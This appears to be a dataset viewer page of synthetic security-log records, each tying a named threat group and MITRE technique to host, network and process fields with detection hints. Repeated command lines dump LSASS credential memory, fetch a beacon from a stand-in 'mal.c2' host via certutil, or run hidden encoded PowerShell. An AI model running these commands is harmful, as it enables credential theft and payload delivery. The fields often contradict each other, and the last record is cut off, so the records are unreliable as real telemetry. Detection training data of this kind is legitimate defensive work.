text stringlengths 1.13k 1.33k |
|---|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Collection","Impact","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20260801T184502000Z_0012601","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.171.138.174","name":"APP-WEB-53P8P5XKJT","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12601APT41T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.83.244.125","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2361 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-23T02:32:20.000Z","user":{"name":"svc_90dx1zicinn0","sid":"S-1-5-21-952679792-402594513-1603"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20260616T014958000Z_0012603","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.248.90.138","name":"AZURE-VM-QAURA4ESUQ","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12603Mustang PandaT1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.29.22.162","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1691 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-22T20:10:19.000Z","user":{"name":"CORP\\2ll2n8st73n3","sid":"S-1-5-21-378382361-250798150-9919"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration"],"technique_id":"T1566.001"},"event_id":"evt_unc4841_20250624T232828000Z_0012605","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.218.203.212","name":"WIN-FIN-SRV-9G1XM8PB4X","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12605UNC4841T1566.001"},"network":{"domain":"github.com","dst_ip":"1.152.165.123","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-11-12T10:37:19.000Z","user":{"name":"CORP\\eg0v2663k1ys","sid":"S-1-5-21-429117467-265283911-2646"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Execution"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20260809T224452000Z_0012607","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.157.49.29","name":"APP-WEB-QGO4CMPRJJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12607UNC4841T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.124.88.92","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-06-21T18:45:42.000Z","user":{"name":"azuread\\u7kesinshnyl","sid":"S-1-5-21-668820565-783782847-1182"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20260117T051549000Z_0012609","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.235.250.55","name":"APP-WEB-LB9HF48FNH","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12609UNC4841T1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.143.68.58","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3295 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-24T11:04:02.000Z","user":{"name":"svc_7xonirrxapsu","sid":"S-1-5-21-402189182-611755900-3979"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control","Discovery"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20260502T071326000Z_0012611","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.15.82.152","name":"DB-ORACLE-J6R57AGYNH","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12611UNC4841T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.118.211.5","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3146 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-04-23T02:28:39.000Z","user":{"name":"arn:aws:iam::pmiacjywfgfk","sid":"S-1-5-21-664233745-766435953-4022"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement","Discovery"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20260506T063306000Z_0012613","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.241.98.253","name":"EC2-INST-DUBPIBCHCY","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12613APT41T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.161.225.7","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 602 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-18T00:59:34.000Z","user":{"name":"svc_ngr1muiqpasp","sid":"S-1-5-21-192183505-386503006-1873"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Initial Access","Command and Control","Impact"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20260530T021627000Z_0012615","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.48.189.133","name":"IAM-ROLE-76NODMYWXE","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12615APT41T1098.004"},"network":{"domain":"github.com","dst_ip":"1.73.169.193","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1196 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-02T02:33:18.000Z","user":{"name":"i-b70wqsyl6ugf","sid":"S-1-5-21-591119975-540413593-7208"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection"],"technique_id":"T1531"},"event_id":"evt_apt41_20261008T033613000Z_0012617","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.119.192.212","name":"EC2-INST-OQF11W6280","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12617APT41T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.189.155.43","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3184 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-12-10T07:47:58.000Z","user":{"name":"CORP\\h5mcws1lxwwc","sid":"S-1-5-21-760350309-335817886-2358"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Initial Access"],"technique_id":"T1098.004"},"event_id":"evt_apt29_20250421T110558000Z_0012619","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.18.66.160","name":"AZURE-VM-VYMFQ9RY6S","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12619APT29T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.131.86.242","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-02-23T16:38:14.000Z","user":{"name":"arn:aws:iam::lrtdso7m9tpe","sid":"S-1-5-21-435532160-404767027-4052"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Defense Evasion","Command and Control","Persistence"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20261113T171303000Z_0012621","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.117.25.65","name":"AZURE-VM-X6GFBTODIA","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12621FIN7T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.56.71.100","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1084 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-02T16:44:49.000Z","user":{"name":"arn:aws:iam::rs2qrxcvr0oq","sid":"S-1-5-21-273821789-286524442-8083"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20250722T212526000Z_0012623","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.48.186.143","name":"IAM-ROLE-2EMYSTDQW0","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12623UNC4841T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.149.211.76","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2655 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-05-02T23:35:53.000Z","user":{"name":"CORP\\s0y1hwnqt6o8","sid":"S-1-5-21-789033092-709950616-6728"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Collection","Reconnaissance","Discovery"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20261225T104555000Z_0012625","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.234.55.102","name":"DB-ORACLE-B0CW4P7YFP","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12625UNC4841T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.169.213.246","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3009 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-10-20T09:44:10.000Z","user":{"name":"svc_v2nn37avf78z","sid":"S-1-5-21-885893170-752977347-8369"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Credential Access","Persistence","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20251017T171211000Z_0012627","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.84.242.43","name":"WIN-FIN-SRV-T2LQLW752I","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12627Scattered SpiderT1546.003"},"network":{"domain":"github.com","dst_ip":"1.61.4.217","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2268 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-09-20T21:17:56.000Z","user":{"name":"arn:aws:iam::pp7j0bq4inyf","sid":"S-1-5-21-870858085-880626840-9001"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Persistence"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20261201T195739000Z_0012629","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.100.52.10","name":"IAM-ROLE-RVODV8VYW9","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12629UNC4841T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.66.228.237","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-02-01T20:10:56.000Z","user":{"name":"i-wqlg8bdhi87q","sid":"S-1-5-21-414426443-198333595-6421"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Credential Access","Command and Control"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20260525T223305000Z_0012631","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.208.172.68","name":"IAM-ROLE-RTUM05NLCE","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12631Volt TyphoonT1531"},"network":{"domain":"github.com","dst_ip":"1.137.103.151","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-07T20:56:45.000Z","user":{"name":"arn:aws:iam::8jhy1sbzfr90","sid":"S-1-5-21-414302432-207836585-6902"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Command and Control","Initial Access","Collection"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20260207T075514000Z_0012633","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.3.214.76","name":"APP-WEB-VJKSVNS60Z","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12633Mustang PandaT1546.003"},"network":{"domain":"github.com","dst_ip":"1.103.249.234","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3423 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-10-26T15:18:20.000Z","user":{"name":"svc_f7uaqxsjvbt3","sid":"S-1-5-21-304236507-764225272-3905"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Discovery","Reconnaissance","Execution"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20251106T225731000Z_0012635","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.133.179.34","name":"WIN-FIN-SRV-ZGI3FRH7RN","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12635Lapsus$T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.112.107.151","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-08-18T20:17:18.000Z","user":{"name":"i-g03mi6ao6gxa","sid":"S-1-5-21-693391994-397517144-9078"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Initial Access"],"technique_id":"T1059.001"},"event_id":"evt_mustangpanda_20260110T172142000Z_0012637","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.228.196.104","name":"DB-ORACLE-5MQCOK5247","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12637Mustang PandaT1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.27.111.173","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2393 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-04-13T17:17:00.000Z","user":{"name":"CORP\\hf4fnjna1ld1","sid":"S-1-5-21-837210350-952427386-8169"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20260614T011755000Z_0012639","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.85.34.54","name":"IAM-ROLE-8AO9IKHAF5","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12639Volt TyphoonT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.167.185.221","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-01-31T11:41:10.000Z","user":{"name":"azuread\\3rszhnj2j79v","sid":"S-1-5-21-556237837-654179278-6374"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Discovery","Command and Control","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_unc4841_20251011T132220000Z_0012641","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.114.229.199","name":"AZURE-VM-OPK4NG1B22","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12641UNC4841T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.43.211.38","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 899 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-25T15:29:40.000Z","user":{"name":"arn:aws:iam::skp20jtl7m40","sid":"S-1-5-21-559745303-389921816-3660"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Defense Evasion","Collection"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20250801T151246000Z_0012643","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.216.69.124","name":"DB-ORACLE-4QC0QBAPQ2","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12643APT29T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.105.231.220","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 660 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-06-29T00:39:21.000Z","user":{"name":"CORP\\hcdoin667mvk","sid":"S-1-5-21-880174062-395892469-2160"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Command and Control"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20261227T125811000Z_0012645","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.129.12.12","name":"AZURE-VM-ZO8VP6QLXR","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12645Lapsus$T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.21.50.120","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-06T17:19:50.000Z","user":{"name":"CORP\\3yn65ozubvob","sid":"S-1-5-21-485884570-375957359-1328"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Lateral Movement","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20251204T025828000Z_0012647","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.198.28.183","name":"WIN-FIN-SRV-XNOV7VC8T9","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"12647Lapsus$T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.90.85.121","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3988 C:\\temp\\lsass.dmp 